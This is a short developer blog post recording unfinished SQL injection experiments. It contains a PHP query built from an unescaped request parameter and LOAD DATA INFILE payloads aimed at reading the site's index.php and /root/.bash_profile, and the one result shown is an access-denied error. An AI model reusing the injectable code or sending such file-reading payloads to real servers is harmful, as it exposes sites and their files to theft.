by Andrew Johnstone
I wrote this a while ago, whilst playing with SQL Injection, however a little unfinished, the idea was to try to write out entire files, through an SQL Injection attack.
I thought I would expand, on my previous post Exceptions, Exceptions, Exceptions, and see what is possible with a simple a SQL Injection attack. I will base this on the assumption, that if you’ve managed to overlook an arbitry SQL Injection attack, I will assume that there will be vulnerable output somewhere.
$id = ($_REQUEST['id'])? (int) $_REQUEST['id'] : 0;
$SearchTerm = (isset($_REQUEST['q']))? $_REQUEST['q'] : null;
if ( $id!=0 && !empty($SearchTerm) ) {
$SQL = "SELECT id, StartDate, EndDate, Title FROM Table_One WHERE id={$id} AND Title='{$SearchTerm}';";
$Query = mysql_query($SQL) or die('Query Error: '.mysql_error());
$Row = mysql_fetch_array($Query, MYSQL_ASSOC);
if(!empty($Row['Title'])) {
print $Row['Title'];
}
}
A couple experiments with sql injection.
LOAD%20DATA%20INFILE%20'/home/httpd/vhosts/ajohnstone.com/httpdocs/index.php'%20INTO%20TABLE%20test.OUTRUN;
LOAD DATA INFILE '/root/.bash_profile' INTO TABLE test.OUTRUN;
string(96) "LOAD DATA INFILE '/home/httpd/vhosts/ajohnstone.com/httpdocs/index.php' INTO TABLE test(Output);"
Query Error: Access denied for user 'user@'localhost' (using password: YES)
I have been a developer for roughly 10 years and have worked with an extensive range of technologies. Whilst working for relatively small companies, I have worked with all aspects of the development life cycle, which has given me a broad and in-depth experience.